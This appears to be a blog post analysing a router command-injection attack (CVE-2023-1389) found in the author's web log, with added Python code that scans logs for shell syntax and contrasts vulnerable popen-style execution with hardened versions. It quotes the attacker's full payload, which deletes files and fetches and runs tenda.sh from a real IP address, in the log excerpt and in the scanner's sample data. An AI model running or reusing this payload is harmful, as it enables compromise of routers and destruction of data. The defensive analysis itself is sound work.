Mon, 12 Feb 2024 21:28:02 EST
Check this out.
The following request is extracted from my web server log for February 11th. I have added line breaks.
GET /cgi-bin/luci/;stok=/locale?
form=country&
operation=write&
country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)
LuCI is the web interface to OpenWrt, which is Linux-based firmware for routers and network devices. This is a command-injection attack. I am not familiar with LuCI, but something on this request path clearly hands the country parameter to a Bourne shell, which evaluates the $(...) command substitution (the commands inside it run in a subshell). What a disaster.
After percent-decoding, the command substitution reads:
rm -rf *; cd /tmp; wget http://192.3.152.183/tenda.sh; chmod 777 tenda.sh; ./tenda.sh
In English: Recursively delete everything in the current directory (the * glob does not match dot-files, so those survive). Change to the /tmp directory, which is typically world-writeable. Download a file named tenda.sh from 192.3.152.183. Make it readable, writeable, and executable by all users. Run it.
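To pull this kind of request out of a log and decode it, here is an added example (mine, not the post's): it parses Common Log Format lines, percent-decodes the query parameters, flags any value containing shell syntax, and splits the command substitution into its individual commands. It generalizes beyond this one request: backtick substitution, separators, variable expansion and redirections are flagged too. The two log lines are constructed for the example, modelled on the request above but not copied from the author's log.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample log lines (Common Log Format).  Line 1 carries the same
# payload as the request in the post; line 2 is a benign request to the same path.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Feb/2024:03:14:15 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192.3.152.183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 196
192.0.2.11 - - [11/Feb/2024:03:15:01 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Shell constructs that should never appear in a value destined for a command line.
SHELL_PATTERNS = [
    (r'\$\(', 'command substitution $(...)'),
    (r'`', 'backtick substitution'),
    (r'[;&|]', 'command separator or pipe'),
    (r'\$\{?\w', 'variable expansion'),
    (r'[<>]', 'redirection'),
]


def decode_request(line):
    """Return (decoded path, [(param, decoded value), ...]) for one log line, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    # keep_blank_values so an injected parameter with an empty value still shows up;
    # parse_qsl percent-decodes each name and value for us.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return unquote(parts.path), params


def find_injection(line):
    """Flag shell syntax in any decoded query parameter.

    Returns [(param, reason, decoded value), ...]; empty when the request looks clean.
    """
    decoded = decode_request(line)
    if decoded is None:
        return []
    _path, params = decoded
    hits = []
    for name, value in params:
        for pattern, reason in SHELL_PATTERNS:
            if re.search(pattern, value):
                hits.append((name, reason, value))
                break  # one reason per parameter is enough
    return hits


def extract_payload(value):
    """Return the commands inside a $(...) or `...` substitution, split on ';'."""
    m = re.search(r'\$\((.*)\)|`(.*)`', value, re.S)
    body = (m.group(1) or m.group(2)) if m else value
    return [cmd.strip() for cmd in body.split(';') if cmd.strip()]


def scan_log(text):
    """Return [(line number, hits), ...] for every log line that carries shell syntax."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = find_injection(line)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == '__main__':
    for lineno, hits in scan_log(SAMPLE_LOG):
        for name, reason, value in hits:
            print(f'line {lineno}: parameter {name!r}: {reason}')
            for cmd in extract_payload(value):
                print('   ', cmd)
```

Note that the `;` inside the payload arrives percent-encoded (%3B), so it survives query-string parsing and only becomes a separator once the value reaches a shell; that is why the check runs on the decoded values, not on the raw request line.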
Tenda is a brand; the company makes Wi-Fi routers and webcams. The script name suggests the operator is running a campaign against Tenda devices as well, but the endpoint in this request is not Tenda's: the update below identifies the CVE, which is a TP-Link Archer AX21 flaw, so the filename identifies the campaign rather than the box being targeted here. The IP address has a reverse DNS entry that points to a host under ficanera.info, but that name, unsurprisingly, has no matching forward DNS entry.
Update February 13th: The vulnerability targeted by this attack is described in CVE-2023-1389. The value of the country parameter is interpolated, unsanitized, into a command string that the backend runs via popen(). That library function is a shortcut that fork()s and exec()s /bin/sh -c with the supplied string, with one end of a pipe attached to the child's stdin or stdout. Because the string goes through the shell, the shell performs the $(...) command substitution, running the attacker's commands, before the intended command is even started. What a disaster.
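The popen() hazard and its fix, as an added example of my own rather than anything from the firmware or the post. Python's subprocess with shell=True runs /bin/sh -c on the string, which is exactly what popen(3) does, so it reproduces the bug faithfully; the "echo country=" command is a stand-in for whatever the firmware actually runs, and the two-letter allow-list is my assumption about what a country code should look like, not the vendor's rule. The injected value uses a harmless echo instead of the real payload.

```python
import re
import shlex
import subprocess


def _run_shell(cmd):
    # /bin/sh -c cmd, the same thing popen(3) does under the hood
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout.strip()


def _run_argv(argv):
    # execve() with an argv list: no shell, so no command substitution
    return subprocess.run(argv, capture_output=True, text=True).stdout.strip()


def set_country_vulnerable(country):
    """The popen() pattern from the post: the parameter is pasted into a shell
    command line.  $(...) in `country` is evaluated by the shell first."""
    return _run_shell("echo country=" + country)   # stand-in command (assumption)


def set_country_quoted(country):
    """If a shell is unavoidable, single-quote the value so it is passed as data."""
    return _run_shell("echo country=" + shlex.quote(country))


def set_country_argv(country):
    """Pass the value as its own argv element; shell syntax in it is never interpreted."""
    return _run_argv(["echo", "country=" + country])


# Assumed validation rule: ISO 3166-1 alpha-2 shape.  Not the firmware's rule.
COUNTRY_RE = re.compile(r'^[A-Z]{2}$')


def set_country_hardened(country):
    """Allow-list first, then argv execution.  Rejecting bad input is the real fix;
    argv execution is the backstop in case validation is ever bypassed."""
    if not COUNTRY_RE.match(country):
        raise ValueError(f"rejected country value {country!r}")
    return set_country_argv(country)


if __name__ == '__main__':
    hostile = "$(echo INJECTED)"
    print("vulnerable:", set_country_vulnerable(hostile))
    print("quoted:    ", set_country_quoted(hostile))
    print("argv:      ", set_country_argv(hostile))
    try:
        set_country_hardened(hostile)
    except ValueError as e:
        print("hardened:  ", e)
```

Running it shows the vulnerable path printing country=INJECTED, because the shell ran the substitution before echo saw its arguments, while the quoted and argv paths print the literal $(echo INJECTED) and the hardened path refuses the value outright.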